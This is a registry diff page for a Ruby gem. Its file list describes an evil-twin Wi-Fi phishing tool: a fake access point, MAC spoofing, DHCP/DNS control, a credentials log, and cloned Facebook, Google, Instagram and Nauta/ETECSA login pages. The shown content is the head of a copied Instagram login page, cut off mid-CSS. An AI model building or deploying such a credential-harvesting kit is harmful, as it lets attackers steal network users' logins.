wibrfake-brk 0.0.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +7 -0
- data/.dockerignore +48 -0
- data/.gitattributes +19 -0
- data/.github/dependabot.yml +12 -0
- data/.github/workflows/ci.yml +90 -0
- data/.rubocop.yml +8 -0
- data/.ruby-version +1 -0
- data/Dockerfile +69 -0
- data/Gemfile +68 -0
- data/README.md +188 -0
- data/Rakefile +6 -0
- data/app/assets/config/manifest.js +5 -0
- data/app/assets/images/.keep +0 -0
- data/app/assets/images/2024-12-30-07:58:34-screenshot.png +0 -0
- data/app/assets/images/facebook/facebook-logo.svg +3 -0
- data/app/assets/images/google/googlelogo_color_272x92dp.png +0 -0
- data/app/assets/images/instagram/app-store.png +0 -0
- data/app/assets/images/instagram/google-play.png +0 -0
- data/app/assets/images/instagram/instagram-logo.png +0 -0
- data/app/assets/images/instagram/screenshot1.png +0 -0
- data/app/assets/images/instagram/screenshot2.png +0 -0
- data/app/assets/images/instagram/screenshot3.png +0 -0
- data/app/assets/images/instagram/screenshot4.png +0 -0
- data/app/assets/images/nauta_etecsa/CUBADEBATE.jpg +0 -0
- data/app/assets/images/nauta_etecsa/CUBAEDUCA.jpg +0 -0
- data/app/assets/images/nauta_etecsa/CUBARTE.jpg +0 -0
- data/app/assets/images/nauta_etecsa/CUBASI.jpg +0 -0
- data/app/assets/images/nauta_etecsa/ECURED.jpg +0 -0
- data/app/assets/images/nauta_etecsa/OFERTAS.jpg +0 -0
- data/app/assets/images/nauta_etecsa/PAPELETA.jpg +0 -0
- data/app/assets/images/nauta_etecsa/contenedor_bg.jpg +0 -0
- data/app/assets/images/nauta_etecsa/etecsa.jpg +0 -0
- data/app/assets/images/nauta_etecsa/nauta_wifi.jpg +0 -0
- data/app/assets/images/nauta_hogar/CUBADEBATE.jpg +0 -0
- data/app/assets/images/nauta_hogar/CUBAEDUCA.jpg +0 -0
- data/app/assets/images/nauta_hogar/CUBARTE.jpg +0 -0
- data/app/assets/images/nauta_hogar/CUBASI.jpg +0 -0
- data/app/assets/images/nauta_hogar/ECURED.jpg +0 -0
- data/app/assets/images/nauta_hogar/OFERTAS.jpg +0 -0
- data/app/assets/images/nauta_hogar/PAPELETA.jpg +0 -0
- data/app/assets/images/nauta_hogar/banner_hogar.png +0 -0
- data/app/assets/images/wibrfake/Breaker-Wallpaper1.jpg +0 -0
- data/app/assets/images/wibrfake/mac-list-parameter.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-100x100.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-32x32.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-48x48.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-apfake-on.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-apfake-set-basic.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-apfake-show.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-help.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-hostpot.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-init.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-init2.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-login-basic.jpg +0 -0
- data/app/assets/images/wibrfake/wibrfake-mac-list.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-mac-ramset-oui.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-mac-ramset.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-mac-set.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-mac-show.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-need-signin.jpg +0 -0
- data/app/assets/images/wibrfake/wibrfake-session-active.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-session-init.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-session-list.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-session-new.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-session-rename.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-session-save.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-web-server-apfake.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-web-server-on.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-web-server-show.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-wkdump-loaded.png +0 -0
- data/app/assets/images/wibrfake/wibrfake-wkdump.png +0 -0
- data/app/assets/images/wibrfake/wibrfake.png +0 -0
- data/app/assets/stylesheets/application.css +15 -0
- data/app/assets/stylesheets/basic/page_basic.css +0 -0
- data/app/assets/stylesheets/facebook/page_facebook.css +93 -0
- data/app/assets/stylesheets/google/page_google.css +137 -0
- data/app/assets/stylesheets/instagram/page_instagram.css +94 -0
- data/app/assets/stylesheets/nauta_etecsa/page_nauta.css +325 -0
- data/app/assets/stylesheets/nauta_hogar/page_nauta.css +469 -0
- data/app/assets/stylesheets/wibrfake/page_wibrfake.css +1181 -0
- data/app/assets/stylesheets/wibrfake/page_wibrfake_about.css +486 -0
- data/app/channels/application_cable/channel.rb +4 -0
- data/app/channels/application_cable/connection.rb +4 -0
- data/app/controllers/application_controller.rb +15 -0
- data/app/controllers/concerns/.keep +0 -0
- data/app/controllers/sessions_controller.rb +111 -0
- data/app/helpers/application_helper.rb +2 -0
- data/app/helpers/sessions_helper.rb +2 -0
- data/app/javascript/application.js +3 -0
- data/app/javascript/bootstrap.bundle.min.js +7 -0
- data/app/javascript/controllers/application.js +9 -0
- data/app/javascript/controllers/hello_controller.js +7 -0
- data/app/javascript/controllers/index.js +4 -0
- data/app/javascript/google/page_google.js +50 -0
- data/app/javascript/incorrect3.js +29 -0
- data/app/javascript/page_wibrfake.js +50 -0
- data/app/javascript/page_wibrfake_about.js +147 -0
- data/app/jobs/application_job.rb +7 -0
- data/app/mailers/application_mailer.rb +4 -0
- data/app/models/application_record.rb +3 -0
- data/app/models/concerns/.keep +0 -0
- data/app/models/user.rb +6 -0
- data/app/views/layouts/application.html.erb +33 -0
- data/app/views/layouts/mailer.html.erb +13 -0
- data/app/views/layouts/mailer.text.erb +1 -0
- data/app/views/pwa/manifest.json.erb +22 -0
- data/app/views/pwa/service-worker.js +26 -0
- data/app/views/sessions/basic/basic.html.erb +21 -0
- data/app/views/sessions/facebook/facebook.html.erb +132 -0
- data/app/views/sessions/google/google.html.erb +72 -0
- data/app/views/sessions/index.html.erb +11 -0
- data/app/views/sessions/instagram/instagram.html.erb +69 -0
- data/app/views/sessions/nauta_etecsa/nauta_etecsa.html.erb +97 -0
- data/app/views/sessions/nauta_hogar/nauta_hogar.html.erb +135 -0
- data/app/views/sessions/wibrfake/about/about.html.erb +164 -0
- data/app/views/sessions/wibrfake/wibrfake.html.erb +417 -0
- data/bin/.names.rb.swp +0 -0
- data/bin/brakeman +7 -0
- data/bin/bundle +114 -0
- data/bin/docker-entrypoint +13 -0
- data/bin/google.wkdump +3 -0
- data/bin/importmap +4 -0
- data/bin/rails +4 -0
- data/bin/rake +4 -0
- data/bin/rubocop +8 -0
- data/bin/setup +37 -0
- data/bin/wibrfake +20 -0
- data/config/application.rb +26 -0
- data/config/boot.rb +4 -0
- data/config/cable.yml +10 -0
- data/config/credentials.yml.enc +1 -0
- data/config/database.yml +16 -0
- data/config/environment.rb +5 -0
- data/config/environments/development.rb +85 -0
- data/config/environments/production.rb +105 -0
- data/config/environments/test.rb +67 -0
- data/config/icons/application-x-wkdump.xml +13 -0
- data/config/icons/hicolor/16x16/mimetypes/application-x-wkdump.png +0 -0
- data/config/icons/hicolor/32x32/mimetypes/application-x-wkdump.png +0 -0
- data/config/icons/hicolor/48x48/mimetypes/application-x-wkdump.png +0 -0
- data/config/icons/hicolor/icon-theme.cache +0 -0
- data/config/icons/hicolor/index.theme +20 -0
- data/config/icons/wkdump.desktop +5 -0
- data/config/importmap.rb +7 -0
- data/config/initializers/assets.rb +12 -0
- data/config/initializers/content_security_policy.rb +25 -0
- data/config/initializers/devise.rb +313 -0
- data/config/initializers/filter_parameter_logging.rb +8 -0
- data/config/initializers/inflections.rb +16 -0
- data/config/initializers/permissions_policy.rb +13 -0
- data/config/locales/devise.en.yml +65 -0
- data/config/locales/en.yml +31 -0
- data/config/puma.rb +35 -0
- data/config/routes.rb +12 -0
- data/config/storage.yml +34 -0
- data/config.ru +6 -0
- data/db/development.sqlite3 +0 -0
- data/db/schema.rb +14 -0
- data/ext/wibrfake/extconf.rb +3 -0
- data/ext/wibrfake/wibrfake.h +0 -0
- data/images/ouilist.png +0 -0
- data/images/wibrfakehelp.png +0 -0
- data/images/wibrfakeinit.png +0 -0
- data/lib/assets/.keep +0 -0
- data/lib/tasks/.keep +0 -0
- data/lib/wibrfake/Config/ipaddr.rb +71 -0
- data/lib/wibrfake/Config/options.rb +98 -0
- data/lib/wibrfake/Config/security_wpa.rb +43 -0
- data/lib/wibrfake/DataBase/howuis.db +0 -0
- data/lib/wibrfake/DataBase/ouis.db +0 -0
- data/lib/wibrfake/DataBase/ouis.rb +24 -0
- data/lib/wibrfake/DataBase/rename.rb +15 -0
- data/lib/wibrfake/DataBase/show.rb +18 -0
- data/lib/wibrfake/Dnsmasq/dhcp.rb +149 -0
- data/lib/wibrfake/Dnsmasq/dhcp_prueba.rb +135 -0
- data/lib/wibrfake/Dnsmasq/dns.rb +34 -0
- data/lib/wibrfake/Dnsmasq/dns_prueba.rb +36 -0
- data/lib/wibrfake/Dnsmasq/dnsmasq.rb +33 -0
- data/lib/wibrfake/Listing/apfake.rb +28 -0
- data/lib/wibrfake/Listing/clients.rb +76 -0
- data/lib/wibrfake/Listing/ouis.rb +53 -0
- data/lib/wibrfake/Listing/process.rb +14 -0
- data/lib/wibrfake/Listing/sessions.rb +47 -0
- data/lib/wibrfake/Listing/web_server.rb +17 -0
- data/lib/wibrfake/Listing/wireless.rb +30 -0
- data/lib/wibrfake/Logs/credentials.log +59 -0
- data/lib/wibrfake/NetworkInterface/ip-routing.rb +99 -0
- data/lib/wibrfake/NetworkInterface/mac.rb +114 -0
- data/lib/wibrfake/NetworkInterface/monitor.rb +44 -0
- data/lib/wibrfake/NetworkInterface/ouis.db +0 -0
- data/lib/wibrfake/Process/id.rb +11 -0
- data/lib/wibrfake/Process/pids.log +5 -0
- data/lib/wibrfake/Process/pkill.rb +124 -0
- data/lib/wibrfake/Process/processes.rb +76 -0
- data/lib/wibrfake/Rails/login.rb +20 -0
- data/lib/wibrfake/Rails/routes.rb +76 -0
- data/lib/wibrfake/Rails/service.rb +58 -0
- data/lib/wibrfake/Rails/service_usage.rb +46 -0
- data/lib/wibrfake/Sessions/session.rb +188 -0
- data/lib/wibrfake/String/string.rb +109 -0
- data/lib/wibrfake/Tmp/config.yml +1 -0
- data/lib/wibrfake/config.rb +24 -0
- data/lib/wibrfake/help.rb +107 -0
- data/lib/wibrfake/optionpr.rb +68 -0
- data/lib/wibrfake/run.rb +9 -0
- data/lib/wibrfake/ty/apld.rb +110 -0
- data/lib/wibrfake/ty/prompt/answers_collector.rb +78 -0
- data/lib/wibrfake/ty/prompt/block_paginator.rb +59 -0
- data/lib/wibrfake/ty/prompt/choice.rb +147 -0
- data/lib/wibrfake/ty/prompt/choices.rb +129 -0
- data/lib/wibrfake/ty/prompt/confirm_question.rb +158 -0
- data/lib/wibrfake/ty/prompt/const.rb +17 -0
- data/lib/wibrfake/ty/prompt/converter_dsl.rb +21 -0
- data/lib/wibrfake/ty/prompt/converter_registry.rb +69 -0
- data/lib/wibrfake/ty/prompt/converters.rb +182 -0
- data/lib/wibrfake/ty/prompt/distance.rb +49 -0
- data/lib/wibrfake/ty/prompt/enum_list.rb +433 -0
- data/lib/wibrfake/ty/prompt/errors.rb +31 -0
- data/lib/wibrfake/ty/prompt/evaluator.rb +29 -0
- data/lib/wibrfake/ty/prompt/expander.rb +321 -0
- data/lib/wibrfake/ty/prompt/keypress.rb +98 -0
- data/lib/wibrfake/ty/prompt/list.rb +589 -0
- data/lib/wibrfake/ty/prompt/mask_question.rb +96 -0
- data/lib/wibrfake/ty/prompt/multi_list.rb +224 -0
- data/lib/wibrfake/ty/prompt/multiline.rb +72 -0
- data/lib/wibrfake/ty/prompt/paginator.rb +111 -0
- data/lib/wibrfake/ty/prompt/question/checks.rb +105 -0
- data/lib/wibrfake/ty/prompt/question/modifier.rb +96 -0
- data/lib/wibrfake/ty/prompt/question/validation.rb +72 -0
- data/lib/wibrfake/ty/prompt/question.rb +391 -0
- data/lib/wibrfake/ty/prompt/result.rb +42 -0
- data/lib/wibrfake/ty/prompt/selected_choices.rb +77 -0
- data/lib/wibrfake/ty/prompt/slider.rb +286 -0
- data/lib/wibrfake/ty/prompt/statement.rb +55 -0
- data/lib/wibrfake/ty/prompt/suggestion.rb +113 -0
- data/lib/wibrfake/ty/prompt/symbols.rb +89 -0
- data/lib/wibrfake/ty/prompt/test.rb +36 -0
- data/lib/wibrfake/ty/prompt/timer.rb +75 -0
- data/lib/wibrfake/ty/prompt/utils.rb +42 -0
- data/lib/wibrfake/ty/prompt/version.rb +7 -0
- data/lib/wibrfake/ty/prompt.rb +589 -0
- data/lib/wibrfake/version.rb +5 -0
- data/lib/wibrfake/wibrfake_cli.rb +683 -0
- data/log/.keep +0 -0
- data/pruebas/daemon1.pid +1 -0
- data/pruebas/daemon2.pid +1 -0
- data/pruebas/daemons.rb +44 -0
- data/public/404.html +67 -0
- data/public/406-unsupported-browser.html +66 -0
- data/public/422.html +67 -0
- data/public/500.html +66 -0
- data/public/icon.png +0 -0
- data/public/icon.svg +3 -0
- data/public/robots.txt +1 -0
- data/storage/.keep +0 -0
- data/test/application_system_test_case.rb +5 -0
- data/test/channels/application_cable/connection_test.rb +13 -0
- data/test/controllers/.keep +0 -0
- data/test/controllers/sessions_controller_test.rb +7 -0
- data/test/fixtures/files/.keep +0 -0
- data/test/fixtures/users.yml +11 -0
- data/test/helpers/.keep +0 -0
- data/test/integration/.keep +0 -0
- data/test/mailers/.keep +0 -0
- data/test/models/.keep +0 -0
- data/test/models/user_test.rb +7 -0
- data/test/system/.keep +0 -0
- data/test/test_helper.rb +15 -0
- data/tmp/.keep +0 -0
- data/tmp/pids/.keep +0 -0
- data/tmp/storage/.keep +0 -0
- data/vendor/.keep +0 -0
- data/vendor/javascript/.keep +0 -0
- data/wibrfake.gemspec +49 -0
- metadata +743 -0
@@ -0,0 +1,69 @@
|
|
1
|
+
<!DOCTYPE html>
|
2
|
+
<html class="_9dls _ar44 js-focus-visible _aa4d __fb-dark-mode" lang="en" dir="ltr" data-js-focus-visible=""><head>
|
3
|
+
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><link data-default-icon="https://static.cdninstagram.com/rsrc.php/v4/yI/r/VsNE-OHk_8a.png" rel="icon" sizes="192x192" href="https://static.cdninstagram.com/rsrc.php/v4/yI/r/VsNE-OHk_8a.png"><meta name="bingbot" content="noarchive"><meta name="robots" content="noarchive, noimageindex"><meta charset="utf-8"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="mobile-web-app-capable" content="yes"><meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=2, viewport-fit=cover"><meta name="theme-color" content="#242526"><meta name="theme-color" content="#000000" media="(prefers-color-scheme: dark)"><link rel="apple-touch-icon" sizes="76x76" href="https://static.cdninstagram.com/rsrc.php/v4/yR/r/lam-fZmwmvn.png"><link rel="apple-touch-icon" sizes="120x120" href="https://static.cdninstagram.com/rsrc.php/v4/ys/r/aM-g435MtEX.png"><link rel="apple-touch-icon" sizes="152x152" href="https://static.cdninstagram.com/rsrc.php/v4/yx/r/H1l_HHqi4p6.png"><link rel="apple-touch-icon" sizes="167x167" href="https://static.cdninstagram.com/rsrc.php/v4/yB/r/-7Z_RkdLJUX.png"><link rel="apple-touch-icon" sizes="180x180" href="https://static.cdninstagram.com/rsrc.php/v4/yG/r/De-Dwpd5CHc.png"><link data-default-icon="https://static.cdninstagram.com/rsrc.php/y4/r/QaBlI0OZiks.ico" rel="shortcut icon" type="image/x-icon" href="https://static.cdninstagram.com/rsrc.php/y4/r/QaBlI0OZiks.ico"><link rel="alternate" href="https://www.instagram.com/" hreflang="x-default"><link rel="alternate" href="https://www.instagram.com/?hl=en" hreflang="en"><link rel="alternate" href="https://www.instagram.com/?hl=fr" hreflang="fr"><link rel="alternate" href="https://www.instagram.com/?hl=it" hreflang="it"><link rel="alternate" href="https://www.instagram.com/?hl=de" hreflang="de"><link rel="alternate" href="https://www.instagram.com/?hl=es" hreflang="es"><link rel="alternate" href="https://www.instagram.com/?hl=zh-cn" hreflang="zh-cn"><link rel="alternate" href="https://www.instagram.com/?hl=zh-tw" hreflang="zh-tw"><link rel="alternate" href="https://www.instagram.com/?hl=ja" hreflang="ja"><link rel="alternate" href="https://www.instagram.com/?hl=ko" hreflang="ko"><link rel="alternate" href="https://www.instagram.com/?hl=pt" hreflang="pt"><link rel="alternate" href="https://www.instagram.com/?hl=pt-br" hreflang="pt-br"><link rel="alternate" href="https://www.instagram.com/?hl=af" hreflang="af"><link rel="alternate" href="https://www.instagram.com/?hl=cs" hreflang="cs"><link rel="alternate" href="https://www.instagram.com/?hl=da" hreflang="da"><link rel="alternate" href="https://www.instagram.com/?hl=el" hreflang="el"><link rel="alternate" href="https://www.instagram.com/?hl=fi" hreflang="fi"><link rel="alternate" href="https://www.instagram.com/?hl=hr" hreflang="hr"><link rel="alternate" href="https://www.instagram.com/?hl=hu" hreflang="hu"><link rel="alternate" href="https://www.instagram.com/?hl=id" hreflang="id"><link rel="alternate" href="https://www.instagram.com/?hl=ms" hreflang="ms"><link rel="alternate" href="https://www.instagram.com/?hl=nb" hreflang="nb"><link rel="alternate" href="https://www.instagram.com/?hl=nl" hreflang="nl"><link rel="alternate" href="https://www.instagram.com/?hl=pl" hreflang="pl"><link rel="alternate" href="https://www.instagram.com/?hl=ru" hreflang="ru"><link rel="alternate" href="https://www.instagram.com/?hl=sk" hreflang="sk"><link rel="alternate" href="https://www.instagram.com/?hl=sv" hreflang="sv"><link rel="alternate" href="https://www.instagram.com/?hl=th" hreflang="th"><link rel="alternate" href="https://www.instagram.com/?hl=tl" hreflang="tl"><link rel="alternate" href="https://www.instagram.com/?hl=tr" hreflang="tr"><link rel="alternate" href="https://www.instagram.com/?hl=hi" hreflang="hi"><link rel="alternate" href="https://www.instagram.com/?hl=bn" hreflang="bn"><link rel="alternate" href="https://www.instagram.com/?hl=gu" hreflang="gu"><link rel="alternate" href="https://www.instagram.com/?hl=kn" hreflang="kn"><link rel="alternate" href="https://www.instagram.com/?hl=ml" hreflang="ml"><link rel="alternate" href="https://www.instagram.com/?hl=mr" hreflang="mr"><link rel="alternate" href="https://www.instagram.com/?hl=pa" hreflang="pa"><link rel="alternate" href="https://www.instagram.com/?hl=ta" hreflang="ta"><link rel="alternate" href="https://www.instagram.com/?hl=te" hreflang="te"><link rel="alternate" href="https://www.instagram.com/?hl=ne" hreflang="ne"><link rel="alternate" href="https://www.instagram.com/?hl=si" hreflang="si"><link rel="alternate" href="https://www.instagram.com/?hl=vi" hreflang="vi"><link rel="alternate" href="https://www.instagram.com/?hl=bg" hreflang="bg"><link rel="alternate" href="https://www.instagram.com/?hl=fr-ca" hreflang="fr-ca"><link rel="alternate" href="https://www.instagram.com/?hl=ro" hreflang="ro"><link rel="alternate" href="https://www.instagram.com/?hl=sr" hreflang="sr"><link rel="alternate" href="https://www.instagram.com/?hl=uk" hreflang="uk"><link rel="alternate" href="https://www.instagram.com/?hl=zh-hk" hreflang="zh-hk"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-ar"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-bo"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-cl"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-co"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-cr"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-cu"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-do"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-ec"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-gt"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-hn"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-mx"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-ni"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-pa"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-pr"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-py"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-pe"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-sv"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-uy"><link rel="alternate" href="https://www.instagram.com/?hl=es-la" hreflang="es-ve"><link rel="alternate" href="https://www.instagram.com/?hl=he" hreflang="he"><link rel="alternate" href="https://www.instagram.com/?hl=fa" hreflang="fa"><link rel="alternate" href="https://www.instagram.com/?hl=ar" hreflang="ar"><link rel="alternate" href="https://www.instagram.com/?hl=ur" hreflang="ur"><link rel="alternate" href="https://www.instagram.com/?hl=en-gb" hreflang="en-gb"><link rel="alternate" href="https://www.instagram.com/?hl=sw-ke" hreflang="sw-ke"><link rel="alternate" href="https://www.instagram.com/?hl=ha-ng" hreflang="ha-ng"><link rel="alternate" href="https://www.instagram.com/?hl=am-et" hreflang="am-et"><link rel="alternate" href="https://www.instagram.com/?hl=om-et" hreflang="om-et"><meta property="al:ios:app_name" content="Instagram"><meta property="al:ios:app_store_id" content="389801252"><meta property="al:ios:url" content="instagram://mainfeed"><meta property="al:android:app_name" content="Instagram"><meta property="al:android:package" content="com.instagram.android"><meta property="al:android:url" content="https://www.instagram.com/_n/mainfeed/"><meta property="og:site_name" content="Instagram"><meta property="og:title" content="Instagram"><meta property="og:image" content="https://static.cdninstagram.com/rsrc.php/v4/yR/r/hexDR1NOpRC.png"><meta property="og:url" content="https://instagram.com/"><meta property="fb:app_id" content="124024574287414"><meta name="description" content="Create an account or log in to Instagram - Share what you're into with the people who get you."><link rel="canonical" href="https://www.instagram.com/"><link rel="manifest" href="https://www.instagram.com/data/manifest.json" crossorigin="use-credentials"><meta name="color-scheme" content="dark"><style data-btmanifest="1020948869_main" nonce="">:root, .__ig-light-mode:root, .__ig-light-mode {--fds-black:#000000;--fds-black-alpha-05:rgba(0, 0, 0, 0.05);--fds-black-alpha-10:rgba(0, 0, 0, 0.1);--fds-black-alpha-15:rgba(0, 0, 0, 0.15);--fds-black-alpha-20:rgba(0, 0, 0, 0.2);--fds-black-alpha-30:rgba(0, 0, 0, 0.3);--fds-black-alpha-40:rgba(0, 0, 0, 0.4);--fds-black-alpha-50:rgba(0, 0, 0, 0.5);--fds-black-alpha-60:rgba(0, 0, 0, 0.6);--fds-black-alpha-80:rgba(0, 0, 0, 0.8);--fds-blue-05:#ECF3FF;--fds-blue-30:#AAC9FF;--fds-blue-40:#77A7FF;--fds-blue-60:#1877F2;--fds-blue-70:#2851A3;--fds-blue-80:#1D3C78;--fds-button-text:#444950;--fds-comment-background:#F2F3F5;--fds-dark-mode-gray-35:#CCCCCC;--fds-dark-mode-gray-50:#828282;--fds-dark-mode-gray-70:#4A4A4A;--fds-dark-mode-gray-80:#373737;--fds-dark-mode-gray-90:#282828;--fds-dark-mode-gray-100:#1C1C1C;--fds-gray-00:#F5F6F7;--fds-gray-05:#F2F3F5;--fds-gray-10:#EBEDF0;--fds-gray-20:#DADDE1;--fds-gray-25:#CCD0D5;--fds-gray-30:#BEC3C9;--fds-gray-45:#8D949E;--fds-gray-70:#606770;--fds-gray-80:#444950;--fds-gray-90:#303338;--fds-gray-100:#1C1E21;--fds-green-55:#00A400;--fds-green-65:#51CE70;--fds-highlight:#3578E5;--fds-highlight-cell-background:#ECF3FF;--fds-primary-icon:#1C1E21;--fds-primary-text:#1C1E21;--fds-red-55:#FA383E;--fds-soft:cubic-bezier(.08,.52,.52,1);--fds-spectrum-aluminum-tint-70:#E4F0F6;--fds-spectrum-blue-gray-tint-70:#CFD1D5;--fds-spectrum-cherry:#F35369;--fds-spectrum-cherry-tint-70:#FBCCD2;--fds-spectrum-grape-tint-70:#DDD5F0;--fds-spectrum-grape-tint-90:#F4F1FA;--fds-spectrum-lemon-dark-1:#F5C33B;--fds-spectrum-lemon-tint-70:#FEF2D1;--fds-spectrum-lime:#A3CE71;--fds-spectrum-lime-tint-70:#E4F0D5;--fds-spectrum-orange-tint-70:#FCDEC5;--fds-spectrum-orange-tint-90:#FEF4EC;--fds-spectrum-seafoam-tint-70:#CAEEF9;--fds-spectrum-slate-dark-2:#89A1AC;--fds-spectrum-slate-tint-70:#EAEFF2;--fds-spectrum-teal:#6BCEBB;--fds-spectrum-teal-dark-1:#4DBBA6;--fds-spectrum-teal-dark-2:#31A38D;--fds-spectrum-teal-tint-70:#D2F0EA;--fds-spectrum-teal-tint-90:#F0FAF8;--fds-spectrum-tomato:#FB724B;--fds-spectrum-tomato-tint-30:#F38E7B;--fds-spectrum-tomato-tint-90:#FDEFED;--fds-strong:cubic-bezier(.12,.8,.32,1);--fds-unified-blue-35:#1455B0;--fds-unified-gray-20:#323436;--fds-white:#FFFFFF;--fds-white-alpha-05:rgba(255, 255, 255, 0.05);--fds-white-alpha-10:rgba(255, 255, 255, 0.1);--fds-white-alpha-20:rgba(255, 255, 255, 0.2);--fds-white-alpha-30:rgba(255, 255, 255, 0.3);--fds-white-alpha-40:rgba(255, 255, 255, 0.4);--fds-white-alpha-50:rgba(255, 255, 255, 0.5);--fds-white-alpha-60:rgba(255, 255, 255, 0.6);--fds-white-alpha-80:rgba(255, 255, 255, 0.8);--fds-yellow-20:#FFBA00;--accent:#0095F6;--always-white:#FFFFFF;--always-black:black;--always-dark-gradient:linear-gradient(rgba(0,0,0,0), rgba(0,0,0,0.6));--always-dark-overlay:rgba(0, 0, 0, 0.4);--always-light-overlay:rgba(255, 255, 255, 0.4);--always-gray-40:#65676B;--always-gray-75:#BCC0C4;--always-gray-95:#F0F2F5;--attachment-footer-background:#F0F2F5;--background-deemphasized:#F0F2F5;--badge-background-color-blue:var(--accent);--badge-background-color-dark-gray:var(--secondary-icon);--badge-background-color-gray:var(--disabled-icon);--badge-background-color-green:var(--positive);--badge-background-color-light-blue:var(--highlight-bg);--badge-background-color-red:var(--notification-badge);--badge-background-color-yellow:var(--base-lemon);--base-blue:#1877F2;--base-cherry:#F3425F;--base-grape:#9360F7;--base-lemon:#F7B928;--base-lime:#45BD62;--base-pink:#FF66BF;--base-seafoam:#54C7EC;--base-teal:#2ABBA7;--base-tomato:#FB724B;--text-badge-info-background:hsl(214, 89%, 52%);--text-badge-success-background:#31A24C;--text-badge-attention-background:hsl(40, 89%, 52%);--text-badge-critical-background:#e41e3f;--blue-link:#00376B;--border-focused:#65676B;--card-background:#FFFFFF;--card-background-flat:#F7F8FA;--comment-background:#F0F2F5;--comment-footer-background:#F6F9FA;--dataviz-primary-1:rgb(0,174,143);--disabled-button-background:rgba(0, 149, 246, 0.3);--disabled-button-text:#FFFFFF;--disabled-icon:#BCC0C4;--disabled-text:#BCC0C4;--divider:#DBDBDB;--event-date:#F3425F;--fb-wordmark:#0866FF;--fb-logo:#0866FF;--filter-accent:invert(39%) sepia(57%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(147.75%) hue-rotate(202deg) brightness(97%) contrast(96%);--filter-always-white:invert(100%);--filter-disabled-icon:invert(80%) sepia(6%) saturate(200%) saturate(120%) hue-rotate(173deg) brightness(98%) contrast(89%);--filter-placeholder-icon:invert(59%) sepia(11%) saturate(200%) saturate(135%) hue-rotate(176deg) brightness(96%) contrast(94%);--filter-primary-accent:invert(39%) sepia(57%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(147.75%) hue-rotate(202deg) brightness(97%) contrast(96%);--filter-primary-icon:invert(8%) sepia(10%) saturate(200%) saturate(200%) saturate(166%) hue-rotate(177deg) brightness(104%) contrast(91%);--filter-secondary-button-icon-on-media:invert(100%);--filter-secondary-icon:invert(39%) sepia(21%) saturate(200%) saturate(109.5%) hue-rotate(174deg) brightness(94%) contrast(86%);--filter-warning-icon:invert(77%) sepia(29%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(128%) hue-rotate(359deg) brightness(102%) contrast(107%);--filter-blue-link-icon:invert(30%) sepia(98%) saturate(200%) saturate(200%) saturate(200%) saturate(166.5%) hue-rotate(192deg) brightness(91%) contrast(101%);--filter-positive:invert(37%) sepia(61%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(115%) hue-rotate(91deg) brightness(97%) contrast(105%);--filter-primary-deemphasized-button-icon:invert(28%) sepia(100%) saturate(6042%) hue-rotate(202deg) brightness(96%) contrast(101%);--filter-negative:invert(25%) sepia(33%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(110%) hue-rotate(345deg) brightness(132%) contrast(96%);--focus-ring-blue:#1877F2;--glimmer-spinner-icon:#65676B;--hero-banner-background:#FFFFFF;--hosted-view-selected-state:rgba(45, 136, 255, 0.1);--highlight-bg:#E7F3FF;--hover-overlay:rgba(0, 0, 0, 0.05);--inverse-text:var(--always-white);--list-cell-chevron:#65676B;--media-hover:rgba(68, 73, 80, 0.15);--media-inner-border:rgba(0, 0, 0, 0.1);--media-outer-border:#FFFFFF;--media-pressed:rgba(68, 73, 80, 